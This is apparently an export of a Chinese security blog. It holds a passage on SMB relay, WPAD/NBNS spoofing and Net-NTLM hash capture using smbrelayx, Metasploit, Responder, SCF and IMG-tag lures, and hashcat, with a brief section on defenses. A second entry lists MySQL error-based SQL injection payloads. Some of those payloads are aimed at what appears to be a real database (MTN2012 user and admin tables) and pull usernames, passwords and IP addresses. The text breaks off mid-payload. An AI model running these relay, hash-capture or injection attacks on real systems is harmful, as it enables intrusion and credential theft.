<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">NBTSTAT [ [-A IP address] [-c] [-n] [-R]]</div><div class="line"> -A (适配器状态) 列出指定 IP 地址的远程机器的名称表。</div><div class="line"> -c (缓存) 列出远程[计算机]名称及其 IP 地址的 NBT 缓存</div><div class="line"> -n (名称) 列出本地 NetBIOS 名称。</div><div class="line"> -R (重新加载) 清除和重新加载远程缓存名称表</div></pre></td></tr></table></figure>
<h4 id="SMBRelay"><a href="#SMBRelay" class="headerlink" title="SMBRelay"></a>SMBRelay</h4><p>SMB2<br>Server Message Block (SMB)服务器消息块协议,主要用于在计算机间共享文件、打印机、串口等。SMB2运行在TCP 139和445端口。</p>
<p>使用NTLMv2身份认证</p>
<p><img src="https://i.imgur.com/fB6vgaV.png" alt=""></p>
<ol>
<li>协商</li>
<li>挑战</li>
<li>认证</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">Client (域中机器) ----> Middle Attack (192.168.6.12) ----> Server(192.168.6.4)</div><div class="line"> !</div><div class="line"> !</div><div class="line"> V</div><div class="line"> DC (192.168.6.2)</div></pre></td></tr></table></figure>
<blockquote>
<p>Note<br>Windows Server 2008 R2 需关闭“对通信进行数字签名”,否则smbrelayx.py将报错 <strong>SMB SessionError: STATUS_ACCESS_DENIED({Access Denied}…</strong>,我们也可以通过NETLOGON (CVE-2015-0005)获取SMB session key。</p>
</blockquote>
<p>注册表禁用签名<br>HKLM\System\CurrentControlSet\Services\LanManServer\Parameters<br>RequireSecuritySignature REG_DWORD: 0 = Disabled</p>
<p>利用工具:<br>Impacket<br><a href="https://github.com/CoreSecurity/impacket" target="_blank" rel="external">https://github.com/CoreSecurity/impacket</a></p>
<p>Attack转发SMB请求到Server并执行命令calc.exe</p>
<p><code>python smbrelayx.py -h 192.168.6.4 -c "calc.exe"</code></p>
<p>Client以一个有效的账户登录(通常是域管),命令行执行:</p>
<p><code>dir \\192.168.6.12\c$</code></p>
<p><img src="https://i.imgur.com/0s7ImOr.png" alt=""></p>
<h4 id="SMB签名"><a href="#SMB签名" class="headerlink" title="SMB签名"></a>SMB签名</h4><p>你需要一个有效的机器账户名和NTLM hashes,通过-domain参数指定DC。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">WIN-7JFKE9MFQQ7$:RUOS:00000000000000000000000000000000:FB55268036B7C0ACE6E417F2EF959C28</div></pre></td></tr></table></figure></p>
<p>Usage:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./smbrelayx.py -h 192.168.6.4 -c "calc.exe" -machine-account RUOS/WIN-7JFKE9MFQQ7\$ -machine-hashes LMHASH:NTHASH -domain DC</div></pre></td></tr></table></figure></p>
<p><img src="https://i.imgur.com/MQyVCej.png" alt=""></p>
<h4 id="BadTunnel"><a href="#BadTunnel" class="headerlink" title="BadTunnel"></a>BadTunnel</h4><p>跨网段响应名称查询</p>
<h3 id="WPAD"><a href="#WPAD" class="headerlink" title="WPAD"></a>WPAD</h3><p>WPAD(Web Proxy Auto Discovery)让浏览器通过DHCP和DNS的查询来搜索PAC文件的位置。</p>
<p>当IE Internet Options连接中配置为自动检测设置时,IE会根据以下方式来查找WPAD.dat文件</p>
<ul>
<li>DHCP(252 option)</li>
<li>DNS A record query</li>
<li>NetBios</li>
<li>LLMNR</li>
</ul>
<p>在DNS中创建WPAD (无法解析?)</p>
<p><a href="https://technet.microsoft.com/en-us/library/cc995062.aspx" target="_blank" rel="external">https://technet.microsoft.com/en-us/library/cc995062.aspx</a></p>
<p><img src="https://i.imgur.com/FBblcZW.png" alt=""></p>
<p>Proxy auto-config<br>代理自动配置(PAC)文件定义了应用如何自动选择合适的代理服务器来访问给定的URL,习惯命名proxy.pac,WPAD标准使用wpad.dat。</p>
<p>A simple example of a PAC file:<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">FindProxyForURL</span>(<span class="params">url, host</span>) </span>{</div><div class="line"> <span class="keyword">if</span> (url== <span class="string">'http://www.baidu.com/'</span>) <span class="keyword">return</span> <span class="string">'DIRECT'</span>;</div><div class="line"> <span class="keyword">if</span> (host== <span class="string">'twitter.com'</span>) <span class="keyword">return</span> <span class="string">'SOCKS 127.0.0.10:7070'</span>;</div><div class="line"> <span class="keyword">if</span> (dnsResolve(host) == <span class="string">'10.0.0.100'</span>) <span class="keyword">return</span> <span class="string">'PROXY 127.0.0.1:8086;DIRECT'</span>;</div><div class="line"> <span class="keyword">return</span> <span class="string">'DIRECT'</span>;</div><div class="line">}</div></pre></td></tr></table></figure></p>
<h4 id="如何攻击?"><a href="#如何攻击?" class="headerlink" title="如何攻击?"></a>如何攻击?</h4><p>客户端首先查询WPAD名称IP,然后下载wpad.dat文件配置浏览器代理。</p>
<p>WPAD服务器<br><a href="http://192.168.6.12/wpad.dat" target="_blank" rel="external">http://192.168.6.12/wpad.dat</a></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">FindProxyForURL</span>(<span class="params">url, host</span>) </span>{</div><div class="line"> <span class="comment">// URLs within this network are accessed directly</span></div><div class="line"> <span class="keyword">if</span> (isInNet(host, <span class="string">"127.0.0.1"</span>, <span class="string">"255.255.255.0"</span>))</div><div class="line"> {</div><div class="line"> <span class="keyword">return</span> <span class="string">"DIRECT"</span>;</div><div class="line"> }</div><div class="line"> <span class="comment">// 192.168.6.1:8080 开启http代理</span></div><div class="line"> <span class="keyword">return</span> <span class="string">"PROXY 192.168.6.1:8080; DIRECT"</span>;</div><div class="line">}</div></pre></td></tr></table></figure>
<p>MSF NBNS响应攻击<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">msf > use auxiliary/spoof/nbns/nbns_response</div><div class="line">msf auxiliary(nbns_response) > set regex WPAD</div><div class="line">msf auxiliary(nbns_response) > set spoofip 192.168.6.12</div><div class="line">msf auxiliary(nbns_response) > run</div></pre></td></tr></table></figure></p>
<p>当IE访问链接时,通过NBNS查询WPAD,攻击机将响应IP指向192.168.6.12。IE将自动下载wpad.dat文件并将地址缓存到注册表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]项,此时IE的流量将通过我们的代理服务器。</p>
<p><img src="https://i.imgur.com/Cah3y8L.png" alt=""></p>
<h4 id="抓取HASH"><a href="#抓取HASH" class="headerlink" title="抓取HASH"></a>抓取HASH</h4><p>Net-NTLM hashes 被用来作为网络认证,不同于NTLM hashes,不能用来执行 Pass-The-Hash 攻击,Net-NTLMv2 hash格式如下。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">admin::RUOS:1122334455667788:d5006d468c997ca37845df3d88316477:0101000000000000eaca11bf5f6ed301ca362b9cc58cc07500000000020000000000000000000000</div></pre></td></tr></table></figure>
<p>启动smb服务</p>
<p><img src="https://i.imgur.com/ZC6016i.png" alt=""></p>
<blockquote>
<p>Note<br>auxiliary/server/capture/http_ntlm 通过http方式访问将弹出Windows安全认证窗口</p>
</blockquote>
<p>IMG标签<br><code><img src="\\192.168.6.12\1.jpg" /></code></p>
<p>test.scf放入共享目录<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[Shell]</div><div class="line">Command=2</div><div class="line">IconFile=\\192.168.6.12\test</div><div class="line">[Taskbar]</div><div class="line">Command=ToggleDesktop</div></pre></td></tr></table></figure></p>
<p>当用户打开嵌入IMG标签的网页或者访问含有test.scf文件的共享目录时将自动向192.168.6.12请求认证。</p>
<p><img src="https://i.imgur.com/rYznNPD.png" alt=""></p>
<h4 id="Crack-hash"><a href="#Crack-hash" class="headerlink" title="Crack hash"></a>Crack hash</h4><ul>
<li>字典破解(不推荐)<br>hashcat64 -m 5600 -D 1 –show john_hashes_netntlmv2 example.dict</li>
<li>彩虹表</li>
</ul>
<h3 id="自动化攻击工具"><a href="#自动化攻击工具" class="headerlink" title="自动化攻击工具"></a>自动化攻击工具</h3><ul>
<li><p>Inveigh<br>Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool<br><a href="https://github.com/Kevin-Robertson/Inveigh" target="_blank" rel="external">https://github.com/Kevin-Robertson/Inveigh</a></p>
</li>
<li><p>Responder<br>LLMNR/NBT-NS/mDNS Poisoner<br><a href="https://github.com/SpiderLabs/Responder" target="_blank" rel="external">https://github.com/SpiderLabs/Responder</a></p>
</li>
<li><p>PS>Attack<br><a href="https://github.com/jaredhaight/PSAttack" target="_blank" rel="external">https://github.com/jaredhaight/PSAttack</a></p>
</li>
</ul>
<h4 id="Responder"><a href="#Responder" class="headerlink" title="Responder"></a>Responder</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./Responder.py -I eth0 -wrfvb -u 192.168.6.1:8888</div></pre></td></tr></table></figure>
<p>Responder启动将开启WPAD,SMB,WEB PROXY等服务,并响应所有名字解析到Responder服务器IP。受害者通过Responder代理服务器访问网页将被注入HTML代码 (-b参数),并弹出认证钓鱼页面。当开启Serve-Exe = On参数时将替换客户端下载的所有exe为ExeFilename指定的程序。</p>
<p>由于会自动响应域名名称,导致显示太多信息,我们修改NBTNS.py将其忽略。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># NBT_NS Server class.</span></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">NBTNS</span><span class="params">(BaseRequestHandler)</span>:</span></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">handle</span><span class="params">(self)</span>:</span></div><div class="line"> data, socket = self.request</div><div class="line"> Name = Decode_Name(data[<span class="number">13</span>:<span class="number">45</span>])</div><div class="line"> <span class="keyword">if</span> re.match(<span class="string">r'^([A-Z0-9]+(-[A-Z0-9]+)*\.)+[A-Z]{2,}$'</span>, Name):</div><div class="line"> <span class="comment">#print "this is a domain: " + Name</span></div><div class="line"> <span class="keyword">return</span> <span class="keyword">None</span></div></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/tpHTDCW.png" alt=""></p>
<h3 id="防范"><a href="#防范" class="headerlink" title="防范"></a>防范</h3><ul>
<li>禁用LLMNR<br>reg add “HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient” /v EnableMulticast /t REG_DWORD /d 0 /f<br>reg add “HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows NT\DNSClient” /v EnableMulticast /t REG_DWORD /d 0 /f</li>
<li>禁用NetBIOS</li>
<li>启用SMB签名</li>
</ul>
<h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul>
<li><a href="https://dl.packetstormsecurity.net/1503-exploits/CORE-2015-0005.txt" target="_blank" rel="external">https://dl.packetstormsecurity.net/1503-exploits/CORE-2015-0005.txt</a></li>
<li><a href="https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python" target="_blank" rel="external">https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python</a></li>
<li><a href="https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SMB2/[MS-SMB2].pdf" target="_blank" rel="external">https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SMB2/[MS-SMB2].pdf</a></li>
<li><a href="http://www.ubiqx.org/cifs/SMB.html" target="_blank" rel="external">http://www.ubiqx.org/cifs/SMB.html</a></li>
</ul>
]]></content>
</entry>
<entry>
<title><![CDATA[数据库黑客]]></title>
<url>/2017/11/17/%E6%95%B0%E6%8D%AE%E5%BA%93%E9%BB%91%E5%AE%A2/</url>
<content type="html"><![CDATA[<h2 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h2><p>MYSQL各个版本下载<br><a href="http://mirrors.sohu.com/mysql/" target="_blank" rel="external">http://mirrors.sohu.com/mysql/</a></p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><h4 id="常用报错函数"><a href="#常用报错函数" class="headerlink" title="常用报错函数"></a>常用报错函数</h4><p>FLOOR(X)表示向下取整</p>
<p>select FLOOR(12.2) -> 12</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">UNION</span> ALL <span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">user</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x</div><div class="line"></div><div class="line">[Err] <span class="number">1062</span> - <span class="keyword">Duplicate</span> entry <span class="string">'root@localhost1'</span> <span class="keyword">for</span> <span class="keyword">key</span> <span class="string">'group_key'</span></div><div class="line"></div><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">version</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)a);</div></pre></td></tr></table></figure>
<p>XML文档支持</p>
<p>ExtractValue() 长度32位限制</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (extractvalue(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>)));</div></pre></td></tr></table></figure>
<p>[Err] 1105 - XPATH syntax error: ‘~root@localhost~’</p>
<p>UpdateXML()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (updatexml(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>),<span class="number">1</span>));</div></pre></td></tr></table></figure>
<p>[Err] 1105 - XPATH syntax error: ‘~root@localhost~‘</p>
<a id="more"></a>
<p>geometrycollection()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> geometrycollection((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p>
<p>multipoint()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multipoint((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p>
<p>polygon()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> polygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p>
<p>multipolygon()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multipolygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p>
<p>linestring()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> linestring((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p>
<p>multilinestring()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multilinestring((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p>
<p>exp() 版本在5.5.5以上</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> <span class="keyword">exp</span>(~(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a));</div></pre></td></tr></table></figure>
<h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h3><p>error-based<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">lang=en') AND EXTRACTVALUE(1267,CONCAT(0x5c,0x7170627871,(<span class="keyword">SELECT</span> (<span class="keyword">CASE</span> <span class="keyword">WHEN</span> (<span class="number">1267</span>=<span class="number">1267</span>) <span class="keyword">THEN</span> <span class="number">1</span> <span class="keyword">ELSE</span> <span class="number">0</span> <span class="keyword">END</span>)),<span class="number">0x7170707671</span>)) <span class="keyword">AND</span> (<span class="string">'PeJH'</span>=<span class="string">'PeJH</span></div><div class="line"><span class="string">name=b'</span> <span class="keyword">and</span> extractvalue(<span class="number">1</span>, <span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">SELECT</span> <span class="keyword">string</span> <span class="keyword">FROM</span> t <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>))) <span class="keyword">and</span> a =<span class="string">'1</span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' and extractvalue(1, concat(0x7e,(SELECT string FROM t limit 1,1)) )</span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' and extractvalue(1, (SELECT string FROM t limit 1,1) )</span></div><div class="line"><span class="string">lang=en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">2872</span>,<span class="keyword">CONCAT</span>(<span class="number">0x23</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">id</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">LIMIT</span> <span class="number">7</span>,<span class="number">1</span>))) <span class="keyword">AND</span> (<span class="string">'XTGg'</span>=<span class="string">'XTGg</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">2872</span>,<span class="keyword">CONCAT</span>(<span class="number">0x23</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">id</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">200</span>) <span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">where</span> username=<span class="string">'mihmd'</span> ))) <span class="keyword">and</span> (<span class="number">1</span>=<span class="string">'1;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">4230</span>,<span class="keyword">CONCAT</span>(<span class="number">0x5c</span>,<span class="number">0x716b787871</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(cIpAddress <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.admin <span class="keyword">ORDER</span> <span class="keyword">BY</span> email <span class="keyword">LIMIT</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">0x7170626271</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM</span></div></pre></td></tr></table></figure></p>
<p>//cut string<br>SELECT MID(ColumnName, Start [, Length])<br>CAST(value as type);<br>CHAR<br>SIGNED<br>CONVERT(value, type);<br>LIMIT 18,1 //ahmad</p>
<p>left(‘ruo’,1) = ‘r’<br>substr(‘ruo’,1,1) = ‘r’<br>ascii(‘r’) = 114<br>mid(‘ruo’,1,1) = ‘r’</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div></pre></td><td class="code"><pre><div class="line">(<span class="keyword">SELECT</span> </div><div class="line"><span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">password</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) </div><div class="line"><span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">LIMIT</span> <span class="number">3</span>,<span class="number">1</span>)</div><div class="line"></div><div class="line">lang=en<span class="string">') AND </span></div><div class="line"><span class="string">EXTRACTVALUE(4230,</span></div><div class="line"><span class="string">CONCAT(0x34,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,50) FROM MTN2012.user ORDER BY id LIMIT 18,1))</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string">AND ('</span>JonM<span class="string">'='</span>JonM;</div><div class="line"></div><div class="line">en') AND EXTRACTVALUE(4230,CONCAT(0x5c,0x716b787871,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(username <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">0x7170626271</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">4230</span>,<span class="keyword">CONCAT</span>(<span class="number">0x34</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(username <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>))) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">1</span>,(<span class="keyword">select</span> username <span class="keyword">FROM</span> MTN2012.user <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>)) <span class="keyword">AND</span> (<span class="string">'JonM'</span>=<span class="string">'JonM;</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">where username = 0x6261626e73696969</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">098f6bcd4621d373cade4e832627b4f6</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' </span></div><div class="line"><span class="string">and extractvalue(1, </span></div><div class="line"><span class="string">(SELECT string FROM t limit 1,1)</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select extractValue(1,(SELECT string FROM t limit 1,1))</span></div><div class="line"><span class="string">[Err] 1105 - XPATH syntax error: '</span>f6bcd4621d373cade4e832627b4f6<span class="string">'</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select extractValue(1,(SELECT concat(":",string) FROM t limit 1,1))</span></div><div class="line"><span class="string">[Err] 1105 - XPATH syntax error: '</span>:<span class="number">098</span>f6bcd4621d373cade4e832627b4f<span class="string">'</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">floor</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' </span></div><div class="line"><span class="string">-- and(select 1 from(select count(*),concat((select (select (SELECT distinct 